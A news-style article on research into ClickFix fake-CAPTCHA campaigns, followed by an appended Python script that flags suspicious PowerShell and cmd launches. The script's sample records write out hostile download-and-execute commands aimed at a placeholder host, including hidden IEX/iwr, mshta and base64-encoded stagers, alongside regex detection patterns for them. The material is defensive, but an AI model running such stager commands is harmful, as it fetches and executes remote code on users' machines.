A security researcher analyzed 3,000 live ClickFix payloads and discovered the scam now operates through API-driven infrastructure that delivers customized malware variants to each victim. ClickFix tricks users into manually executing malicious code by displaying fake CAPTCHA pages that claim to verify the visitor is human.
The research reveals ClickFix operators control backend servers that distribute identical malware in different obfuscated forms. This API architecture enables rapid distribution of variants tailored to evade detection. Each payload retains the same functionality but arrives wrapped in unique code, complicating signature-based detection across security tools.
Researchers also identified a new delivery mechanism designed to bypass Windows script execution controls. This method exploits how the operating system processes certain script types, allowing malware to run despite built-in protections.
ClickFix campaigns typically begin with phishing links or malicious ads directing users to websites mimicking legitimate browser security warnings or software updates. The pages instruct victims to copy and paste commands into PowerShell or Command Prompt to "fix" detected threats. Users execute the commands without understanding they're installing malware like information stealers, banking trojans, or backdoors.
The API-driven approach represents operational maturity. Rather than manually crafting variants, operators automate the process. The same base malware receives different encoding, encryption, or obfuscation on each delivery. This complicates attribution and forces defenders to analyze numerous samples that behave identically beneath the surface.
Organizations face persistent risk from ClickFix because it exploits human behavior rather than technical vulnerabilities. Security awareness training reduces exposure, but determined attackers find new obfuscation techniques and delivery angles. The Windows script bypass adds technical depth to what began as a social engineering attack.
Defenders should monitor for suspicious PowerShell or Command Prompt execution, particularly commands copied from external sources
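As an added example (not code from the article or the researcher's analysis), here is a heuristic triage pass in Python over constructed process-creation records: it scores the traits that hand-pasted ClickFix launches tend to share and decodes -EncodedCommand wrappers, so a re-wrapped variant scores the same as its plain form. The indicator weights, parent-process lists and sample records are assumptions.

```python
import base64
import re
# (name, pattern, weight): traits the copy-paste commands described above tend to share; weights are assumptions.
INDICATORS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden\b|/min\b", re.I), 2),
    ("policy_bypass", re.compile(r"-e(?:xecutionpolicy|p)\s+bypass\b", re.I), 1),
    ("remote_fetch", re.compile(r"\b(?:iwr|invoke-webrequest|downloadstring|net\.webclient|curl)\b|mshta\s+https?:", re.I), 2),
    ("memory_exec", re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 2),
    ("encoded_cmd", re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I), 2),
]
# A shell spawned by Explorer (Run dialog) or a browser suggests a user pasted the command by hand.
INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
def decode_encoded_command(cmdline):
    """UTF-16LE plaintext behind -EncodedCommand, or None when absent or not valid base64."""
    match = INDICATORS[4][1].search(cmdline)
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16le") if match else None
    except (ValueError, UnicodeDecodeError):
        return None

def score_event(parent, image, cmdline):
    """Score one process-creation record, scanning the decoded payload as well as its wrapper."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = [name for name, pattern, _ in INDICATORS if pattern.search(text)]
    score = sum(weight for name, _, weight in INDICATORS if name in hits)
    if parent.lower() in INTERACTIVE_PARENTS and image.lower() in SHELLS:
        hits.append("interactive_launch")
        score += 1
    return score, hits

def triage(events, threshold=4):
    """Return (index, score, hits) for every record scoring at or above the threshold."""
    flagged = []
    for i, (parent, image, cmdline) in enumerate(events):
        score, hits = score_event(parent, image, cmdline)
        if score >= threshold:
            flagged.append((i, score, hits))
    return flagged

# Constructed sample records (not real telemetry); the last wraps the first's stager in -EncodedCommand form.
_STAGER = 'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/p")'
_ENCODED = base64.b64encode(_STAGER.encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    ("explorer.exe", "powershell.exe", 'powershell -w hidden -ep bypass -c "iex (iwr http://example.invalid/verify.txt)"'),
    ("explorer.exe", "cmd.exe", "cmd /c start /min mshta http://example.invalid/captcha.hta"),
    ("code.exe", "powershell.exe", "powershell -File C:\\build\\publish.ps1"),
    ("explorer.exe", "powershell.exe", f"powershell -nop -w hidden -enc {_ENCODED}"),
]
```

Because the decoded payload is scanned alongside the wrapper, the encoded variant scores at least as high as the plain one rather than slipping under the threshold.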
